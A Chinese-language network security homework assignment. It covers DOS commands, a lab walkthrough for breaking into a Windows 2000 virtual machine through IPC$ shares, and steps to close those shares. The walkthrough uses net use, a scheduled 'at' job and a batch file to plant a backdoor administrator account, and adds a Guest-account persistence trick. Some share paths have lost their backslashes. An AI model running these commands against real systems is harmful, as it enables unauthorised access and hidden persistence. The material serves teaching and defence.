第二次作业DOS命令与IPC入侵防范.doc

第二次作业DOS命令与IPC入侵防范1、 常用DOS命令（把下列命令运行的结果截图）1、 Ping 2、 Ipconfig3、 Dir 4、 Md 5、 Echo 6、 Type 7、 Net user 8、 net localgroup 9、 At10、 Net stat11、 arp2、 DOS命令综合运用之利用IPC漏洞入侵提权（开启windows 2000与XP虚拟机）利用XP作为客户机，windows 2000作为服务器，在XP中操作入侵wind2000，步骤：1、 开启wind2000 telnet服务可以用OpenTelnet.exe工具，将OpenTelnet.exe拷贝到C盘根目录下并执行OpenTelnet.exe 192.168.2.2 administrator 123456 1 90 如下图2、 给wind2000超级管理员administraror设置密码为123456，如下图3、 利用net use * /del清空所有的IPC连接，如下图4、 利用net use 192.168.2.2ipc$ 123456 /user:administrator建立一个超级IPC连接，如下图5、 利用net use z:192.168.2.2c$ 把windows2000 C盘变成本地磁盘（XP中）的Z盘，打开XP里我的电脑 如下图6、 利用echo net user hack 123456 /add hack.bat和echo net localgroup administrators hack /add hack.bat二条指令建立一个名为hack.bat的后门账号，并利用type查看命令是否正确， 如下图7、 利用copy hack.bat 192.168.2.2c$,把hack.bat拷贝到windows2000的C盘， 如下图8、 利用net time 192.168.2.2查看windows2000系统当前时间，如下图9、 假设当前时间为8:45分，则可以利用 at 192.168.2.2 8:46 c:hack.bat ，来执行hack.bat建立后门账号，如下图：10、 利用net use */del删除IPC连接，如下图11、 等一小段时间后估计windos2000以执行hack.bat，则通过telnet 192.168.2.2去登陆，并利用账号hack ，密码123456验证，若能登陆说明入侵成功。如下图小策略：为了隐蔽可以利用guest账号，net user guest /active:yes将Guest用户激活，net user guest 1234 将Guest的密码改为1234,net localgroup administrators guest /add 将Guest变为Administrator超级管理员，这样，即使以后管理员更改了他的密码，我们也可以用guest登录了。IPC漏了防范：(1) 运行命令提示符(cmd.exe)，在命令提示符下输入如下命令：net share 查看默认共享，如下图(2) 在命令提示符下输入如下命令：net share ipc$ /delete 删除ipc$共享。如下图(3) 逐步使用net share命令，删除c$、d$、e$、f$和admin$共享。如下图(4) 接着在命令提示符下输入如下命令：net stop server /y 停止Server服务，该服务提供 RPC 支持、文件、打印以及命名管道共享，如下图(5) 运行注册表编辑器，找到如下键值：HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters